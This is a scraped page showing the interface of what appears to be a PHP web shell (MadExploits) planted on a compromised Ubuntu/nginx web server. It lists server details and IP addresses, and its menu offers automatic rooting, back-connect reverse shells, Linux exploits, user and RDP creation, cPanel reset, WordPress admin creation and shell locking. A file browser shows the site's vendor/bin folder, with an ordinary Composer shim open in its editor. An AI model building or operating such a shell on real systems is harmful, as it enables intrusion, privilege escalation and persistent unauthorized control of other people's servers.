Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
vendor /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
debug
318
B
-rw-r--r--
debug.bat
132
B
-rw-r--r--
doctrine-dbal
311
B
-rw-r--r--
doctrine-dbal.bat
125
B
-rw-r--r--
php-parse
310
B
-rw-r--r--
php-parse.bat
124
B
-rw-r--r--
phpunit
303
B
-rw-r--r--
phpunit.bat
117
B
-rw-r--r--
psysh
299
B
-rw-r--r--
psysh.bat
113
B
-rw-r--r--
var-dump-server
328
B
-rw-r--r--
var-dump-server.bat
142
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : doctrine-dbal
#!/usr/bin/env sh dir=$(cd "${0%[/\\]*}" > /dev/null; cd "../doctrine/dbal/bin" && pwd) if [ -d /proc/cygdrive ] && [[ $(which php) == $(readlink -n /proc/cygdrive)/* ]]; then # We are in Cgywin using Windows php, so the path must be translated dir=$(cygpath -m "$dir"); fi "${dir}/doctrine-dbal" "$@"
Close